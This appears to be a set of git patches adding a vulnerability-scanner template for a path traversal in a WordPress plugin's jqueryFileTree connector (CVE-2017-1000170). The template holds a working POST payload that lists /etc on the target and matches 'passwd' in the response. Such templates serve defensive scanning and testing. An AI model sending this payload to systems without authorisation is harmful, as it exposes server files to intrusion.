From 53c0e1e954338b2e025817903dc0a6130f20516e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:56:42 +0700 Subject: [PATCH 1/4] :fire: Add CVE-2017-1000170 --- cves/2017/CVE-2017-1000170.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2017/CVE-2017-1000170.yaml diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml new file mode 100644 index 0000000000..ce1200b69f --- /dev/null +++ b/cves/2017/CVE-2017-1000170.yaml @@ -0,0 +1,25 @@ +id: CVE-2017-1000170 + +info: + name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal + author: dwisiswant0 + severity: high + reference: https://www.exploit-db.com/exploits/49693 + description: jqueryFileTree 2.1.5 and older Directory Traversal + tags: cve,cve2017,wp-plugin,traversal + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "
  • " + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file From 2e233a0aa2a0932ae0505ae919f30d5d26dda904 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:56:56 +0700 Subject: [PATCH 2/4] :hammer: Update matchers --- cves/2017/CVE-2017-1000170.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index ce1200b69f..c92526fa51 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -18,6 +18,7 @@ requests: - type: word words: - "
  • " + - "passwd
    • " condition: and part: body - type: status From e49b4a7d8aa315158ca6ff4c8acbdfcd6ce926b2 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:57:15 +0700 Subject: [PATCH 3/4] :pencil2: Add wordpress to tags --- cves/2017/CVE-2017-1000170.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index c92526fa51..dc365005e0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,traversal requests: - method: POST From 86ad55d66fc836b89c6c4b3974579eda53202ca1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 14:07:22 +0530 Subject: [PATCH 4/4] Adding to workflow --- cves/2017/CVE-2017-1000170.yaml | 2 +- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index dc365005e0..cb3e001dd0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wordpress,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,lfi requests: - method: POST diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 4249d902c9..e6aa4f7d72 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -11,6 +11,7 @@ workflows: matchers: - name: wordpress subtemplates: + - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml